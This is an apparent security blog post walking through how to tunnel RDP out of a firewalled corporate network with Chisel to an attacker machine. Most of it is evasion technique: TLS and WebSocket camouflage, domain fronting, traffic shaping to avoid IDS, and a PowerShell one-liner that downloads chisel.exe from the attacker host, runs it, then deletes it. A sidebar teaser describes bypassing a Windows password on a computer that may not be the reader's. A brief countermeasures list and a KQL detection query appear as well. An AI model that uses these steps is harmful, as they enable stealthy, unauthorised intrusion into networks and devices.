Skip to main content

Bypassing Corporate Firewalls with Chisel for RDP Access

 Scenario Overview:

A corporate network restricts inbound connections but allows outbound traffic (e.g., HTTP, HTTPS). We need to access an internal RDP (3389) server behind the firewall from an external attacker-controlled machine.

Constraints:

  • Firewall blocks inbound RDP, SSH, and VPN.

  • Only outbound HTTP/HTTPS is allowed.

  • Direct reverse shells are detected.

Sneaking in without getting caught, when it’s not allowed: Chisel (TCP/HTTP Tunneling)

Chisel creates an encrypted tunnel over allowed protocols (HTTP/WebSockets), bypassing firewall restrictions.

Step-by-Step Exploitation

1. Setup the Chisel Server (Attacker Machine)

On the attacker machine (public IP: 10.10.10.10), start the Chisel server in reverse mode (to allow victim-initiated connections):


  • Listens on port 8080 (HTTP-friendly to evade detection).

  • --reverse ensures ports are opened on the server (attacker) rather than the client (victim).


2. Victim Machine (Internal Network) Connects Back
On the internal Windows machine (behind firewall), run

./chisel client 10.10.10.10:8080 R:3389:localhost:3389


If you look at back to attacker machine, it starts to listen victim’s device:

We now have access to victim’s RDP connection. 
If we want to get “FULL” connection we can use SOCKS feature Chisel.

We can use proxy chain to use our own tools ( Or malware) in victim’s machine 
through the SOCS proxy.
To tho this, we’re using proxychains to tunnel nmap through the proxy 
so we scan the internal network.

As you can see, CHISEL is a very effective and stealthy tool 
to access restricted corporate networks
where there’s an active firewall rules that only allows outbound connections 
but no inbound connections, 
 where you may get detected if you use traditional techniques 
such as reverse shell access or aggressive scanning etc.

Advanced Evasion Techniques & Detection Methods for Chisel Tunneling

Evasion Techniques (Making Chisel Stealthier)

1. Protocol Camouflage

Chisel can tunnel over HTTP/HTTPS, WebSockets, or SSH, but deeper evasion is possible:


Use HTTPS Instead of Raw TCP:

./chisel server --host mylegitdomain.com --port 443 
--reverse --tls-key key.pem --tls-cert cert.pem

  • Hides within legitimate web traffic.
  • Requires a valid TLS certificate 
(can use Let’s Encrypt or self-signed if strict validation is absent).

2.WebSocket Tunneling (Less Noisy Than Raw TCP):
./chisel server -p 443 --reverse --proxy http://proxy.corp.com

Appears as normal WebSocket traffic (common in web apps, 
web socket is used where there’s live chat feature, 
or any other real time data transfered, 
especially in mission critical application features).

Traffic Obfuscation
  • Use --socks5 Instead of Raw Port Forwarding:
    • SOCKS5 is harder to distinguish from regular proxy traffic.
    • Many enterprises allow outbound SOCKS for internal tools.
  • Slow Down Traffic to Mimic Legitimate Patterns:
./chisel client 10.10.10.10:8080 R:3389:localhost:3389 --timeout 5s --keepalive 30s
  • Avoids bursty traffic patterns that trigger IDS alerts.

3. Fileless Execution (Avoiding Disk Writes)
Execute Chisel Directly in Memory:

iwr http://10.10.10.10/chisel.exe -OutFile $env:TEMP\chisel.exe; 
& $env:TEMP\chisel.exe client 10.10.10.10:8080 R:3389:localhost:3389

Delete immediately after execution:
rm $env:TEMP\chisel.exe -Force

4. Domain Fronting (If Cloud Services Are Allowed)
  • Route Traffic Through Legit CDNs (Cloudflare, Akamai):


    ./chisel server --host myrealcdn.cloudfront.net --port 443 --reverse

Countermeasures (Stopping Chisel in Enterprise Networks)
1. Network Hardening
  • Block Outbound Traffic to Uncommon Ports (8080, 4444, etc.).
  • Allow Only Whitelisted Domains (prevent callbacks to attacker servers).
2. Endpoint Controls
  • Restrict Unauthorized Executables (AppLocker/PowerShell Constrained Mode).
  • Monitor Temporary File Creation (C:\Windows\Temp\, $env:TEMP).
3. Behavioral Analysis
  • Alert on Rapid Succession of Network Connections (Chisel heartbeat traffic).
  • Detect Local Port Forwarding (e.g., netsh interface portproxy).

A comprehensive protection requires layered security controls. For organizations needing tailored defense solutions, I offer:
Enterprise-Grade Countermeasures 
  1. Custom Network Traffic Profiling
    • Behavioral analysis of encrypted HTTP/WebSocket traffic
    • Machine learning models tuned to organization’s specific environment
  2. Active Counter-Tunneling Systems
    • Real-time tunnel disruption technology
    • Protocol-level interference for unauthorized proxies
  3. Hardened Endpoint Protection
    • Memory-based execution monitoring
    • Weaponized decoy tunnels for attacker identification
  4. Live Threat Hunting
    • 24/7 SOC monitoring for tunnel artifacts
    • Attack surface reduction through micro segmentation
Labels:

Comments

Post a Comment

Popular posts from this blog

Beyond the Pentest: Why We Do What We Do

  “We had a two-week pentest. They gave us a 40-page report. We fixed the high-severity issues. Are we secure now?” This is a line I’ve heard far too many times from CISOs and security leads and I always give them the same answer: No, you’re not secure. Not even close. I’m a penetration tester, but not the kind you’re used to. Let me explain. The Old Red vs Blue Paradigm Is Dead We’re no longer living in a world where attackers show up, hit your network hard for a few days, and disappear. Real adversaries stay there and observe you for months. Even for Years . They don’t follow rules of engagement. They evolve. They study you. And they compromise you slowly. The traditional red team-blue team separation, and the "2-week pentest, fix top 5 CVEs" checklist approach? It’s outdated. It gives a false sense of security . We don’t play by those rules at Gl1tch | Risk. Offensive Security as a Service – A Different Approach In our practice, we go beyond traditional penetration testing...
Post a Comment
Read more

Entering Password Protected Windows Computer without the Password

 If you have a windows laptop and you don’t know the password for some reason (!) (Maybe it’s not yours ?) and want to login without entering the password, here’s a simple way to hack it without being too technical. You just need to bypass the password protection. I didn’t try this method on other windows versions, you can give it a try but for windows 10 and windows 11 it works perfectly fine. (You need an empty physical pen drive to bypass) Step 1: Download Hiren Boot ISO file: https://www.hirensbootcd.org/ Step 2: Mount the iso file to your USB (You will lose all of the data) You can use RUFUS to do this. I will skip this step. Step 3: Start the windows computer you want to bypass the password, and open the BIOS menu. Depends on the manufacturer the BIOS menu can be opened with F12, ESC or Delete buttons from the keyboard during system boot. Step 4: Select the USB from BIOS menu to boot. Step 5: It will open live os, similar to a windows environment but it’s not… We will use ...
Post a Comment
Read more

Stop the Scammers. Detection of Homoglyph Attack Attempt using KQL (Kusto Query Language)!

  Phishing attempts are getting sneakier, often leveraging homoglyph attacks or unusual characters to trick employees. I put together a simple but effective query to scan for new users created with "weird" characters in the email domain that indicates a potential sign of a spoofed or malicious account creation attempt. KQL Breakdown: This query scans 7 days of CloudAppEvents for the `Create user.` action, then checks the new user's email domain for any non-ASCII characters (characters outside the standard English keyboard set: $\text{U+0000}$ to $\text{U+007F}$) . This is a great starting point for spotting internationalized domain name (IDN) abuse or other sophisticated L3 attacks. CloudAppEvents | where TimeGenerated > ago(7d) | where ActionType == "Create user." | extend Email = tostring(parse_json(RawEventData).EmailAddress) | extend Domain = tostring(split(Email,"@")[1]) | where Domain matches regex @"[^\u0000-\u007F]" | project Ti...
Post a Comment
Read more